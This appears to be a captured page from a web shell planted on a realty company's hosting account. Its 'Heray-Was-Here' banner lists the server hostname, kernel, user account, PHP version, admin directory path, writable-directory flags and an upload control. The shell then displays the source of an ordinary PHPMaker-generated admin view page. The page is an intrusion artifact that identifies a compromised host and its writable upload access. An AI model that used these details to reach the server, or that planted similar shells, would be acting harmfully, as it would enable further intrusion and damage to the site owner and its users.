Heray-Was-Here
Server : Apache
System : Linux hybrid3195.ca.ns.planethoster.net 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
User : alliancerealtynb ( 1004)
PHP Version : 7.4.33
Disable Function : noop
Directory :  /home/alliancerealtynb/www/adminAR/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/alliancerealtynb/www/adminAR/wp_wpl_itemsview.php
<?php
namespace PHPMaker2020\Alliance;

// Autoload
include_once "autoload.php";

// Session
if (session_status() !== PHP_SESSION_ACTIVE)
	\Delight\Cookie\Session::start(Config("COOKIE_SAMESITE")); // Init session data

// Output buffering
ob_start();
?>
<?php

// Write header
WriteHeader(FALSE);

// Create page object
$wp_wpl_items_view = new wp_wpl_items_view();

// Run the page
$wp_wpl_items_view->run();

// Setup login status
SetupLoginStatus();
SetClientVar("login", LoginStatus());

// Global Page Rendering event (in userfn*.php)
Page_Rendering();

// Page Rendering event
$wp_wpl_items_view->Page_Render();
?>
<?php include_once "header.php"; ?>
<?php if (!$wp_wpl_items_view->isExport()) { ?>
<script>
var fwp_wpl_itemsview, currentPageID;
loadjs.ready("head", function() {

	// Form object
	currentPageID = ew.PAGE_ID = "view";
	fwp_wpl_itemsview = currentForm = new ew.Form("fwp_wpl_itemsview", "view");
	loadjs.done("fwp_wpl_itemsview");
});
</script>
<script>
loadjs.ready("head", function() {

	// Client script
	// Write your client script here, no need to add script tags.

});
</script>
<?php } ?>
<?php if (!$wp_wpl_items_view->isExport()) { ?>
<div class="btn-toolbar ew-toolbar">
<?php $wp_wpl_items_view->ExportOptions->render("body") ?>
<?php $wp_wpl_items_view->OtherOptions->render("body") ?>
<div class="clearfix"></div>
</div>
<?php } ?>
<?php $wp_wpl_items_view->showPageHeader(); ?>
<?php
$wp_wpl_items_view->showMessage();
?>
<form name="fwp_wpl_itemsview" id="fwp_wpl_itemsview" class="form-inline ew-form ew-view-form" action="<?php echo CurrentPageName() ?>" method="post">
<?php if ($Page->CheckToken) { ?>
<input type="hidden" name="<?php echo Config("TOKEN_NAME") ?>" value="<?php echo $Page->Token ?>">
<?php } ?>
<input type="hidden" name="t" value="wp_wpl_items">
<input type="hidden" name="modal" value="<?php echo (int)$wp_wpl_items_view->IsModal ?>">
<table class="table table-striped table-sm ew-view-table">
<?php if ($wp_wpl_items_view->id->Visible) { // id ?>
	<tr id="r_id">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_id"><?php echo $wp_wpl_items_view->id->caption() ?></span></td>
		<td data-name="id" <?php echo $wp_wpl_items_view->id->cellAttributes() ?>>
<span id="el_wp_wpl_items_id">
<span<?php echo $wp_wpl_items_view->id->viewAttributes() ?>><?php echo $wp_wpl_items_view->id->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->parent_kind->Visible) { // parent_kind ?>
	<tr id="r_parent_kind">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_parent_kind"><?php echo $wp_wpl_items_view->parent_kind->caption() ?></span></td>
		<td data-name="parent_kind" <?php echo $wp_wpl_items_view->parent_kind->cellAttributes() ?>>
<span id="el_wp_wpl_items_parent_kind">
<span<?php echo $wp_wpl_items_view->parent_kind->viewAttributes() ?>><?php echo $wp_wpl_items_view->parent_kind->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->parent_id->Visible) { // parent_id ?>
	<tr id="r_parent_id">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_parent_id"><?php echo $wp_wpl_items_view->parent_id->caption() ?></span></td>
		<td data-name="parent_id" <?php echo $wp_wpl_items_view->parent_id->cellAttributes() ?>>
<span id="el_wp_wpl_items_parent_id">
<span<?php echo $wp_wpl_items_view->parent_id->viewAttributes() ?>><?php echo $wp_wpl_items_view->parent_id->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->item_type->Visible) { // item_type ?>
	<tr id="r_item_type">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_item_type"><?php echo $wp_wpl_items_view->item_type->caption() ?></span></td>
		<td data-name="item_type" <?php echo $wp_wpl_items_view->item_type->cellAttributes() ?>>
<span id="el_wp_wpl_items_item_type">
<span<?php echo $wp_wpl_items_view->item_type->viewAttributes() ?>><?php echo $wp_wpl_items_view->item_type->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->item_cat->Visible) { // item_cat ?>
	<tr id="r_item_cat">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_item_cat"><?php echo $wp_wpl_items_view->item_cat->caption() ?></span></td>
		<td data-name="item_cat" <?php echo $wp_wpl_items_view->item_cat->cellAttributes() ?>>
<span id="el_wp_wpl_items_item_cat">
<span<?php echo $wp_wpl_items_view->item_cat->viewAttributes() ?>><?php echo $wp_wpl_items_view->item_cat->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->item_name->Visible) { // item_name ?>
	<tr id="r_item_name">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_item_name"><?php echo $wp_wpl_items_view->item_name->caption() ?></span></td>
		<td data-name="item_name" <?php echo $wp_wpl_items_view->item_name->cellAttributes() ?>>
<span id="el_wp_wpl_items_item_name">
<span<?php echo $wp_wpl_items_view->item_name->viewAttributes() ?>><?php echo $wp_wpl_items_view->item_name->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->creation_date->Visible) { // creation_date ?>
	<tr id="r_creation_date">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_creation_date"><?php echo $wp_wpl_items_view->creation_date->caption() ?></span></td>
		<td data-name="creation_date" <?php echo $wp_wpl_items_view->creation_date->cellAttributes() ?>>
<span id="el_wp_wpl_items_creation_date">
<span<?php echo $wp_wpl_items_view->creation_date->viewAttributes() ?>><?php echo $wp_wpl_items_view->creation_date->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->edit_date->Visible) { // edit_date ?>
	<tr id="r_edit_date">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_edit_date"><?php echo $wp_wpl_items_view->edit_date->caption() ?></span></td>
		<td data-name="edit_date" <?php echo $wp_wpl_items_view->edit_date->cellAttributes() ?>>
<span id="el_wp_wpl_items_edit_date">
<span<?php echo $wp_wpl_items_view->edit_date->viewAttributes() ?>><?php echo $wp_wpl_items_view->edit_date->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->enabled->Visible) { // enabled ?>
	<tr id="r_enabled">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_enabled"><?php echo $wp_wpl_items_view->enabled->caption() ?></span></td>
		<td data-name="enabled" <?php echo $wp_wpl_items_view->enabled->cellAttributes() ?>>
<span id="el_wp_wpl_items_enabled">
<span<?php echo $wp_wpl_items_view->enabled->viewAttributes() ?>><?php echo $wp_wpl_items_view->enabled->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->item_extra1->Visible) { // item_extra1 ?>
	<tr id="r_item_extra1">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_item_extra1"><?php echo $wp_wpl_items_view->item_extra1->caption() ?></span></td>
		<td data-name="item_extra1" <?php echo $wp_wpl_items_view->item_extra1->cellAttributes() ?>>
<span id="el_wp_wpl_items_item_extra1">
<span<?php echo $wp_wpl_items_view->item_extra1->viewAttributes() ?>><?php echo $wp_wpl_items_view->item_extra1->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->item_extra2->Visible) { // item_extra2 ?>
	<tr id="r_item_extra2">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_item_extra2"><?php echo $wp_wpl_items_view->item_extra2->caption() ?></span></td>
		<td data-name="item_extra2" <?php echo $wp_wpl_items_view->item_extra2->cellAttributes() ?>>
<span id="el_wp_wpl_items_item_extra2">
<span<?php echo $wp_wpl_items_view->item_extra2->viewAttributes() ?>><?php echo $wp_wpl_items_view->item_extra2->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->item_extra3->Visible) { // item_extra3 ?>
	<tr id="r_item_extra3">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_item_extra3"><?php echo $wp_wpl_items_view->item_extra3->caption() ?></span></td>
		<td data-name="item_extra3" <?php echo $wp_wpl_items_view->item_extra3->cellAttributes() ?>>
<span id="el_wp_wpl_items_item_extra3">
<span<?php echo $wp_wpl_items_view->item_extra3->viewAttributes() ?>><?php echo $wp_wpl_items_view->item_extra3->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->item_extra4->Visible) { // item_extra4 ?>
	<tr id="r_item_extra4">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_item_extra4"><?php echo $wp_wpl_items_view->item_extra4->caption() ?></span></td>
		<td data-name="item_extra4" <?php echo $wp_wpl_items_view->item_extra4->cellAttributes() ?>>
<span id="el_wp_wpl_items_item_extra4">
<span<?php echo $wp_wpl_items_view->item_extra4->viewAttributes() ?>><?php echo $wp_wpl_items_view->item_extra4->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->item_extra5->Visible) { // item_extra5 ?>
	<tr id="r_item_extra5">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_item_extra5"><?php echo $wp_wpl_items_view->item_extra5->caption() ?></span></td>
		<td data-name="item_extra5" <?php echo $wp_wpl_items_view->item_extra5->cellAttributes() ?>>
<span id="el_wp_wpl_items_item_extra5">
<span<?php echo $wp_wpl_items_view->item_extra5->viewAttributes() ?>><?php echo $wp_wpl_items_view->item_extra5->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->params->Visible) { // params ?>
	<tr id="r_params">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items_params"><?php echo $wp_wpl_items_view->params->caption() ?></span></td>
		<td data-name="params" <?php echo $wp_wpl_items_view->params->cellAttributes() ?>>
<span id="el_wp_wpl_items_params">
<span<?php echo $wp_wpl_items_view->params->viewAttributes() ?>><?php echo $wp_wpl_items_view->params->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
<?php if ($wp_wpl_items_view->_index->Visible) { // index ?>
	<tr id="r__index">
		<td class="<?php echo $wp_wpl_items_view->TableLeftColumnClass ?>"><span id="elh_wp_wpl_items__index"><?php echo $wp_wpl_items_view->_index->caption() ?></span></td>
		<td data-name="_index" <?php echo $wp_wpl_items_view->_index->cellAttributes() ?>>
<span id="el_wp_wpl_items__index">
<span<?php echo $wp_wpl_items_view->_index->viewAttributes() ?>><?php echo $wp_wpl_items_view->_index->getViewValue() ?></span>
</span>
</td>
	</tr>
<?php } ?>
</table>
</form>
<?php
$wp_wpl_items_view->showPageFooter();
if (Config("DEBUG"))
	echo GetDebugMessage();
?>
<?php if (!$wp_wpl_items_view->isExport()) { ?>
<script>
loadjs.ready("load", function() {

	// Startup script
	// Write your table-specific startup script here
	// console.log("page loaded");

});
</script>
<?php } ?>
<?php include_once "footer.php"; ?>
<?php
$wp_wpl_items_view->terminate();
?>

Hry